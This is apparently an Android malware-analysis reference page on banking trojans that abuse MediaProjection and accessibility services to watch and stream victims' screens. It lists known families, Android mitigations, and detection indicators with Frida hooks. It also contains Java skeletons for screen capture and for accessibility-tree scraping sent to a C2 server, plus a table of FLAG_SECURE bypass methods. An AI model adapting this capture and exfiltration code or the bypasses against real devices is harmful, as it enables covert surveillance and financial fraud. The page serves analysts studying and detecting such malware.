Screen Recording & MediaProjection Abuse
Capturing the victim's screen in real time to steal credentials, monitor activity, or enable remote device control. Unlike overlay attacks that present fake UI, screen capture techniques passively observe the real UI -- the victim interacts with their actual banking app while the attacker watches or records every frame.
See also: Camera & Mic Surveillance, Notification Suppression
Requirements
| Requirement | Details |
|---|---|
| Permission | FOREGROUND_SERVICE (Android 9+) with a mediaProjection foreground service type (Android 10+) and the FOREGROUND_SERVICE_MEDIA_PROJECTION permission (Android 14+), or BIND_ACCESSIBILITY_SERVICE |
| User Interaction | MediaProjection consent dialog (one-time tap), or accessibility service enablement |
| Infrastructure | C2 server or WebSocket endpoint for live streaming |
Techniques
MediaProjection API
The primary screen recording mechanism since Android 5.0. The android.media.projection.MediaProjection class creates a virtual display that mirrors the device screen. The attacker obtains a MediaProjection token through MediaProjectionManager.createScreenCaptureIntent(), which triggers a system consent dialog.
MediaProjection Setup and Virtual Display Creation
// Ask the system for the consent intent; the result arrives in onActivityResult().
MediaProjectionManager projectionManager =
        (MediaProjectionManager) getSystemService(MEDIA_PROJECTION_SERVICE);
Intent captureIntent = projectionManager.createScreenCaptureIntent();
startActivityForResult(captureIntent, REQUEST_CODE);
On receiving the result:
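@Override
protected void onActivityResult(int requestCode, int resultCode, Intent data) {
    super.onActivityResult(requestCode, resultCode, data);
    // Ignore unrelated results and the case where the user declined the dialog.
    if (requestCode != REQUEST_CODE || resultCode != RESULT_OK || data == null) return;
    MediaProjection projection = projectionManager.getMediaProjection(resultCode, data);
    // Android 14+ requires a registered callback before the virtual display is created.
    projection.registerCallback(new MediaProjection.Callback() {}, null);
    VirtualDisplay display = projection.createVirtualDisplay(
            "capture",
            screenWidth, screenHeight, screenDensity,
            DisplayManager.VIRTUAL_DISPLAY_FLAG_AUTO_MIRROR,
            surface, null, null
    );
}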
The Surface target can be an ImageReader for screenshots, a MediaRecorder for video files, or a MediaCodec encoder feeding frames to a network socket for live streaming.
Malware typically wraps this in a foreground service to maintain the projection while backgrounded. The encoded frames (H.264 or MJPEG) stream to C2 over WebSocket or a custom TCP protocol.
Accessibility-Based Screen Reading
An alternative that requires no MediaProjection consent. The accessibility service traverses the AccessibilityNodeInfo tree to extract all visible text from the current screen.
Accessibility Tree Traversal for Screen Reading
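@Override
public void onAccessibilityEvent(AccessibilityEvent event) {
    AccessibilityNodeInfo root = getRootInActiveWindow();
    if (root == null) return;
    extractNodes(root);
}

// Walks the subtree depth-first; each node is recycled exactly once, by the call that visits it.
private void extractNodes(AccessibilityNodeInfo node) {
    if (node.getText() != null) {
        // getClassName() can return null, so do not call toString() on it directly.
        sendToC2(String.valueOf(node.getClassName()), node.getText().toString());
    }
    for (int i = 0; i < node.getChildCount(); i++) {
        AccessibilityNodeInfo child = node.getChild(i);
        if (child != null) {
            // The recursive call recycles child; recycling it again here would throw on older releases.
            extractNodes(child);
        }
    }
    node.recycle();
}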
This captures text content but not visual layout, images, or rendered WebView content. For banking trojans targeting specific fields, it is often sufficient -- account balances, transaction details, and form field values are all accessible as text nodes.
VNC / Remote Access
Several banking trojan families implement full VNC-like remote access by combining screen capture with input injection. The attacker views the victim's screen in real time and sends touch/gesture commands back to the device.
| Component | Implementation |
|---|---|
| Screen capture | MediaProjection frames encoded as H.264/VP8 |
| Input injection | Accessibility dispatchGesture() or performAction() |
| Protocol | Custom binary over WebSocket, or adapted VNC RFB protocol |
| Latency | Typically 200-500ms round trip |
This gives the attacker full interactive control of the device, enabling manual fraud operations where the attacker logs into the banking app, navigates menus, and initiates transfers while watching the screen.
Screen Streaming to C2
The real-time streaming pipeline used by most families:
- MediaProjection captures frames, typically through an ImageReader surface
- Frames encoded via MediaCodec (hardware H.264) or downscaled to JPEG
- Encoded data pushed over WebSocket or raw TCP to C2
- C2 panel renders the stream, optionally with touch input relay
Frame rate is typically throttled to 1-5 FPS to reduce bandwidth. Some families (Octo, Vultur) use adaptive quality -- higher FPS during active interaction, dropping to periodic screenshots when the screen is idle.
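The effect of that throttling on network traffic can be estimated with simple arithmetic, which helps when judging whether a sustained outbound stream is consistent with screen streaming. The sketch below is illustrative only: the class name is hypothetical and the 40 KB average frame size is an assumption chosen for the example, not a figure measured from any family.

```java
/** Rough bandwidth estimate for a throttled frame stream (illustrative sketch). */
final class StreamBandwidthEstimate {

    /** Bytes per second for a stream of frames with a given average size. */
    static long bytesPerSecond(int framesPerSecond, long averageFrameBytes) {
        if (framesPerSecond < 0 || averageFrameBytes < 0) {
            throw new IllegalArgumentException("inputs must be non-negative");
        }
        return framesPerSecond * averageFrameBytes;
    }

    public static void main(String[] args) {
        // ASSUMPTION: roughly 40 KB per downscaled JPEG frame; real sizes vary with content.
        long assumedFrameBytes = 40_000;
        for (int fps = 1; fps <= 5; fps++) {
            long kbPerSecond = bytesPerSecond(fps, assumedFrameBytes) / 1000;
            System.out.println(fps + " FPS -> " + kbPerSecond + " KB/s");
        }
    }
}
```

Under that assumed frame size, the 1-5 FPS range corresponds to roughly 40-200 KB/s of steady upload, so the traffic is modest but continuous rather than bursty.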
FLAG_SECURE Bypass Attempts
Apps can set FLAG_SECURE on their windows to prevent screenshots and screen recording. When active, MediaProjection captures black frames for that window.
| Bypass Method | How It Works | Effectiveness |
|---|---|---|
| Accessibility tree reading | Ignores FLAG_SECURE entirely since it reads node text, not pixels | Full bypass for text content |
| Root + framebuffer access | Reads /dev/graphics/fb0 directly | Requires root, works on older kernels |
| Root + SurfaceFlinger | screencap via adb shell with elevated privileges | Requires root |
| Xposed/LSPosed hooks | Hook Window.setFlags() to strip FLAG_SECURE | Requires Xposed framework |
| Virtual display tricks | Some older Android versions didn't enforce FLAG_SECURE on virtual displays | Patched in Android 12+ |
Most malware relies on accessibility tree reading as the FLAG_SECURE bypass since it requires no root and works across all Android versions. The pixel-level bypasses are limited to rooted devices or exploit chains.
Android Mitigations
| Version | Change | Impact on Malware |
|---|---|---|
| Android 5.0 | MediaProjection API introduced | Screen recording possible without root |
| Android 5.0-9 | Consent dialog, no ongoing indicator | Malware shows dialog once, records indefinitely |
| Android 10 | Foreground service type mediaProjection required | Must declare foreground service type in manifest |
| Android 10 | Persistent notification required for media projection | User sees ongoing notification (malware disguises it) |
| Android 11 | MediaProjection token no longer reusable across app restarts | Must re-trigger consent after process death |
| Android 12 | Status bar indicator for active screen sharing | User may notice the status bar indicator |
| Android 14 | Consent dialog shown before each capture session | Breaks single-consent-then-record-forever pattern |
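| Android 14 | MediaProjection.Callback.onCapturedContentVisibilityChanged() callback | Notifies the capturing app, not the captured app, when the captured content is shown or hidden |
| Android 14 | Screenshot detection API (Activity.ScreenCaptureCallback) | Target apps can respond to screenshots of their activities |
| Android 15 | Screen recording detection (WindowManager.addScreenRecordingCallback()) | Target apps can detect when their windows are being recorded |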
Android Version Trend
Each version makes MediaProjection harder to abuse silently. This pushes malware toward accessibility-based screen reading, which remains unaffected by these mitigations.
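During triage it can be useful to ask which of these changes apply on the device or emulator a sample is running on. The following is a minimal sketch that encodes a subset of the table rows by API level (Android 5.0 = 21, 10 = 29, 11 = 30, 12 = 31, 14 = 34). The class and method names are hypothetical, and the row descriptions are paraphrased from the table rather than taken from platform documentation.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.NavigableMap;
import java.util.TreeMap;

/** Looks up which MediaProjection-related changes apply at a given API level (illustrative sketch). */
final class ProjectionMitigations {

    // Key: first API level where the change applies. Value: short description from the table.
    private static final NavigableMap<Integer, String> BY_API_LEVEL = new TreeMap<>();

    static {
        BY_API_LEVEL.put(21, "Consent dialog for MediaProjection");
        BY_API_LEVEL.put(29, "Foreground service type and persistent notification required");
        BY_API_LEVEL.put(30, "Projection token not reusable across app restarts");
        BY_API_LEVEL.put(31, "Status bar indicator for active screen sharing");
        BY_API_LEVEL.put(34, "Consent required before each capture session");
    }

    /** Returns every listed change introduced at or below the given API level, oldest first. */
    static List<String> appliesAt(int apiLevel) {
        return new ArrayList<>(BY_API_LEVEL.headMap(apiLevel, true).values());
    }

    public static void main(String[] args) {
        // Example: an Android 12 test device (API 31).
        for (String change : appliesAt(31)) {
            System.out.println(change);
        }
    }
}
```

A sample that still records silently on an API 34 image, for example, is worth a closer look, since the single-consent pattern should no longer work there.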
Families Using This Technique
| Family | Method | Details |
|---|---|---|
| Hook | VNC via accessibility | Full remote access with touch relay, streams accessibility tree state to attacker panel |
| Octo | MediaProjection + accessibility | Live screen streaming at adaptive FPS, combined with accessibility for input injection |
| BRATA | MediaProjection recording | Records screen to local storage, exfiltrates video files to C2 |
| SpyNote | MediaProjection live stream | Real-time screen sharing with bidirectional control, RAT-style remote access |
| Vultur | MediaProjection via AlphaVNC/ngrok | Screen recording streamed through ngrok tunnels, later versions switched to custom protocol |
| TrickMo | Accessibility screen capture | Captures screen content via accessibility tree traversal, targets banking app fields |
| Medusa | MediaProjection + VNC | Live streaming with remote control capabilities |
| BingoMod | VNC via MediaProjection | Screen-based VNC for on-device fraud |
| Brokewell | MediaProjection streaming | Real-time screen mirroring to attacker |
| Gigabud | MediaProjection | Screen recording triggered via accessibility, avoids overlay attacks entirely |
Detection During Analysis
Static Indicators
- FOREGROUND_SERVICE_MEDIA_PROJECTION in AndroidManifest.xml
- MediaProjectionManager or createScreenCaptureIntent in decompiled code
- VirtualDisplay, ImageReader, or MediaCodec usage
- AccessibilityNodeInfo tree traversal with data exfiltration
- WebSocket or raw socket connections combined with media encoding classes
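A first pass over decompiled output can be automated with a plain string search for the identifiers listed above. The sketch below assumes the manifest or decompiled source has already been loaded into a string; the class and method names are hypothetical. Legitimate screen recorders and accessibility tools use the same APIs, so a hit is a lead for manual review, not a verdict.

```java
import java.util.ArrayList;
import java.util.List;

/** Searches decompiled text for the static indicators listed above (illustrative sketch). */
final class StaticIndicatorScan {

    // Identifiers taken from the static indicator list.
    private static final String[] INDICATORS = {
        "FOREGROUND_SERVICE_MEDIA_PROJECTION",
        "MediaProjectionManager",
        "createScreenCaptureIntent",
        "VirtualDisplay",
        "ImageReader",
        "MediaCodec",
        "AccessibilityNodeInfo"
    };

    /** Returns the indicators present in the text, in the order they are listed above. */
    static List<String> findIndicators(String decompiledText) {
        List<String> hits = new ArrayList<>();
        for (String indicator : INDICATORS) {
            if (decompiledText.contains(indicator)) {
                hits.add(indicator);
            }
        }
        return hits;
    }

    public static void main(String[] args) {
        String sample = "Intent i = mgr.createScreenCaptureIntent(); // mgr is a MediaProjectionManager";
        System.out.println(findIndicators(sample));
    }
}
```

Obfuscated samples may resolve these classes through reflection or encrypted strings, in which case the search comes back empty and the dynamic hooks are the better starting point.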
Frida: Hook MediaProjection Creation
Java.perform(function() {
    var MediaProjectionManager = Java.use("android.media.projection.MediaProjectionManager");
    // Android 14 added a second overload taking MediaProjectionConfig, so select the no-argument one explicitly.
    MediaProjectionManager.createScreenCaptureIntent.overload().implementation = function() {
        console.log("[*] MediaProjection capture intent created");
        // Log the call stack to locate the code that requested capture.
        console.log(Java.use("android.util.Log").getStackTraceString(
            Java.use("java.lang.Exception").$new()
        ));
        return this.createScreenCaptureIntent();
    };
    var MediaProjection = Java.use("android.media.projection.MediaProjection");
    MediaProjection.createVirtualDisplay.overload(
        "java.lang.String", "int", "int", "int", "int",
        "android.view.Surface", "android.hardware.display.VirtualDisplay$Callback",
        "android.os.Handler"
    ).implementation = function(name, w, h, dpi, flags, surface, cb, handler) {
        console.log("[*] VirtualDisplay created: " + name + " (" + w + "x" + h + ")");
        return this.createVirtualDisplay(name, w, h, dpi, flags, surface, cb, handler);
    };
});
Frida: Monitor Accessibility Tree Traversal
Java.perform(function() {
    var AccessibilityNodeInfo = Java.use("android.view.accessibility.AccessibilityNodeInfo");
    AccessibilityNodeInfo.getText.implementation = function() {
        var text = this.getText();
        if (text != null) {
            console.log("[*] AccessibilityNodeInfo.getText(): " + text.toString());
        }
        return text;
    };
});
Dynamic Indicators
- Foreground service notification appearing after accessibility enablement
- High CPU usage from MediaCodec encoding
- Sustained outbound data stream (WebSocket or TCP) with consistent bandwidth
- VirtualDisplay instance visible in dumpsys display
- Accessibility service with flagRetrieveInteractiveWindows and flagRequestFilterKeyEvents
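The last indicator can also be checked against the accessibility service configuration XML, where android:accessibilityFlags holds a pipe-separated list of flag names. The sketch below assumes the attribute value has already been extracted as a string with symbolic names (as a decoder such as apktool typically produces); the class and method names are hypothetical.

```java
import java.util.HashSet;
import java.util.Set;

/** Checks an android:accessibilityFlags value for the flag pair noted above (illustrative sketch). */
final class AccessibilityFlagCheck {

    /** Splits a value such as "flagDefault|flagRetrieveInteractiveWindows" into individual flag names. */
    static Set<String> parseFlags(String attributeValue) {
        Set<String> flags = new HashSet<>();
        for (String part : attributeValue.split("\\|")) {
            String flag = part.trim();
            if (!flag.isEmpty()) {
                flags.add(flag);
            }
        }
        return flags;
    }

    /** True when the service requests both window retrieval and key event filtering. */
    static boolean hasWindowAndKeyEventFlags(String attributeValue) {
        Set<String> flags = parseFlags(attributeValue);
        return flags.contains("flagRetrieveInteractiveWindows")
                && flags.contains("flagRequestFilterKeyEvents");
    }

    public static void main(String[] args) {
        String value = "flagDefault|flagRetrieveInteractiveWindows|flagRequestFilterKeyEvents";
        System.out.println(hasWindowAndKeyEventFlags(value));
    }
}
```

Services can also set these flags at runtime through setServiceInfo(), so a clean XML file does not rule the combination out.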
Relationship to Other Techniques
Screen capture is often combined with other attack techniques:
- Accessibility abuse provides the input injection needed for full remote access
- Overlay attacks are sometimes replaced entirely by screen capture (the attacker watches the victim use the real app)
- Keylogging captures the same credential data through input events rather than visual observation